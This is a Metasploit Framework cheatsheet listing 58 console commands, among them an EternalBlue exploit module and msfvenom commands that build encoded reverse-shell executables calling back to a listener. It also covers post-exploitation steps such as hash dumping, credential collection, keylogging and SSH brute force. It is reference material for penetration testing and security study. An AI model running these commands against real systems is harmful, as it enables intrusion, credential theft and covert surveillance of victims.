Metasploit Cheatsheet

Quick reference for Metasploit Framework covering msfconsole, modules, exploits, payloads, post-exploitation, auxiliary, Meterpreter, and database commands

Related Categories:Security

58 commands

msfconsole

Launch the Metasploit Framework console

msfconsole

msfconsole -q

Launch msfconsole without banner

msfconsole -q

msfconsole -r

Launch msfconsole with a resource script

msfconsole -r commands.rc

help

Display help for available commands

help search

version

Display Metasploit version information

version

exit / quit

Exit msfconsole

exit

banner

Display Metasploit banner

banner

search

Search modules by keyword

search type:exploit platform:windows smb

use

Select a module to use

use exploit/windows/smb/ms17_010_eternalblue

info

Display detailed module information

info exploit/windows/smb/ms17_010_eternalblue

show options

Display current module options

show options

show targets

Display available targets for the module

show targets

show payloads

Display compatible payloads

show payloads

back

Leave the current module

back

previous

Return to the previously used module

previous

set RHOSTS

Set target IP address

set RHOSTS 192.168.1.100

set RPORT

Set target port number

set RPORT 445

set LHOST

Set listener IP address

set LHOST 192.168.1.50

set LPORT

Set listener port number

set LPORT 4444

exploit / run

Execute the exploit

exploit

exploit -j

Execute exploit as a background job

exploit -j

check

Check if target is vulnerable

check

set TARGET

Specify target OS/architecture

set TARGET 0

set PAYLOAD

Set the payload to use

set PAYLOAD windows/meterpreter/reverse_tcp

msfvenom -p

Generate a standalone payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe

msfvenom --list formats

List available output formats

msfvenom --list formats

msfvenom --list payloads

List available payloads

msfvenom --list payloads

msfvenom -e

Encode payload with specified encoder

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -f exe

msfvenom --list encoders

List available encoders

msfvenom --list encoders

post/multi/recon/local_exploit_suggester

Suggest local privilege escalation exploits

use post/multi/recon/local_exploit_suggester

post/windows/gather/hashdump

Dump Windows password hashes

use post/windows/gather/hashdump

post/multi/manage/shell_to_meterpreter

Upgrade shell session to Meterpreter

use post/multi/manage/shell_to_meterpreter

post/windows/gather/enum_logged_on_users

Enumerate currently logged-on users

use post/windows/gather/enum_logged_on_users

post/linux/gather/enum_configs

Collect Linux configuration files

use post/linux/gather/enum_configs

post/windows/gather/credentials/credential_collector

Collect credentials from various sources

use post/windows/gather/credentials/credential_collector

auxiliary/scanner/portscan/tcp

Execute TCP port scan

use auxiliary/scanner/portscan/tcp

auxiliary/scanner/smb/smb_version

Scan SMB version

use auxiliary/scanner/smb/smb_version

auxiliary/scanner/http/http_version

Detect HTTP server version

use auxiliary/scanner/http/http_version

auxiliary/scanner/ssh/ssh_login

Execute SSH login brute force

use auxiliary/scanner/ssh/ssh_login

auxiliary/scanner/ftp/ftp_anonymous

Check FTP anonymous access availability

use auxiliary/scanner/ftp/ftp_anonymous

auxiliary/server/capture/http_basic

Capture HTTP Basic authentication credentials

use auxiliary/server/capture/http_basic

sysinfo

Display target system information

meterpreter > sysinfo

getuid

Display current user ID

meterpreter > getuid

getsystem

Attempt to escalate to SYSTEM privileges

meterpreter > getsystem

hashdump

Dump hashes from SAM database

meterpreter > hashdump

shell

Get target system shell

meterpreter > shell

upload / download

Transfer files to/from target

meterpreter > upload /tmp/payload.exe C:\\temp\\

screenshot

Take a screenshot of target screen

meterpreter > screenshot

keyscan_start / keyscan_dump

Start keylogger and dump results

meterpreter > keyscan_start && keyscan_dump

portfwd

Set up port forwarding

meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.5

migrate

Migrate Meterpreter to another process

meterpreter > migrate 1234

db_status

Check database connection status

db_status

db_nmap

Run Nmap scan and store results in database

db_nmap -sV -p 1-1000 192.168.1.0/24

hosts

Display hosts stored in database

hosts -c address,os_name

services

Display services stored in database

services -p 80,443

vulns

Display vulnerabilities stored in database

vulns

creds

Display credentials stored in database

creds

workspace

Manage workspaces (project isolation)

workspace -a project_name